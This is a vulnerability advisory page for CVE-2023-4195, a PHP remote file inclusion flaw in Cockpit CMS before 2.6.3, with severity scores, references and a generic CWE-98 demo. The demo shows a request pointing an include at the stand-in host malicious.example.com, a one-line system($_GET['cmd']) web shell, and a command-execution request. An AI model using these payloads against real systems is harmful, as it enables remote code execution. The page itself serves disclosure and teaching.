CVE-2023-4195 - Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')

Severity

88%

Complexity

27%

Confidentiality

98%

PHP Remote File Inclusion in GitHub repository cockpit-hq/cockpit prior to 2.6.3.

CVSS 3.1 Base Score 8.8. CVSS Attack Vector: network. CVSS Attack Complexity: low. CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).

Demo Examples

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')

CWE-98

The following code, victim.php, attempts to include a function contained in a separate PHP page on the server. It builds the path to the file by using the supplied 'module_name' parameter and appending the string '/function.php' to it.


               
include($dir . "/function.php");

The problem with the above code is that the value of $dir is not restricted in any way, and a malicious user could manipulate the 'module_name' parameter to force inclusion of an unanticipated file. For example, an attacker could request the above PHP page (example.php) with a 'module_name' of "http://malicious.example.com" by using the following request string:


               
victim.php?module_name=http://malicious.example.com

Upon receiving this request, the code would set 'module_name' to the value "http://malicious.example.com" and would attempt to include http://malicious.example.com/function.php, along with any malicious code it contains.

For the sake of this example, assume that the malicious version of function.php looks like the following:


               
system($_GET['cmd']);

An attacker could now go a step further in our example and provide a request string as follows:


               
victim.php?module_name=http://malicious.example.com&cmd=/bin/ls%20-l

The code will attempt to include the malicious function.php file from the remote site. In turn, this file executes the command specified in the 'cmd' parameter from the query string. The end result is an attempt by tvictim.php to execute the potentially malicious command, in this case:


               
/bin/ls -l

Note that the above PHP example can be mitigated by setting allow_url_fopen to false, although this will not fully protect the code. See potential mitigations.

Overview

First reported 1 year ago

2023-08-06 18:15:00

Last updated 1 year ago

2023-08-10 16:03:00

Affected Software

Agentejo Cockpit

References

https://github.com/cockpit-hq/cockpit/commit/800c05f1984db291769ffa5fdfb1d3e50968e95b

https://huntr.dev/bounties/0bd5da2f-0e29-47ce-90f3-06518656bfd6

https://github.com/cockpit-hq/cockpit/commit/800c05f1984db291769ffa5fdfb1d3e50968e95b

Patch

https://huntr.dev/bounties/0bd5da2f-0e29-47ce-90f3-06518656bfd6

Exploit, Issue Tracking, Patch, Third Party Advisory

Stay updated

ExploitPedia is constantly evolving. Sign up to receive a notification when we release additional functionality.

Get in touch

If you'd like to report a bug or have any suggestions for improvements then please do get in touch with us using this form. We will get back to you as soon as we can.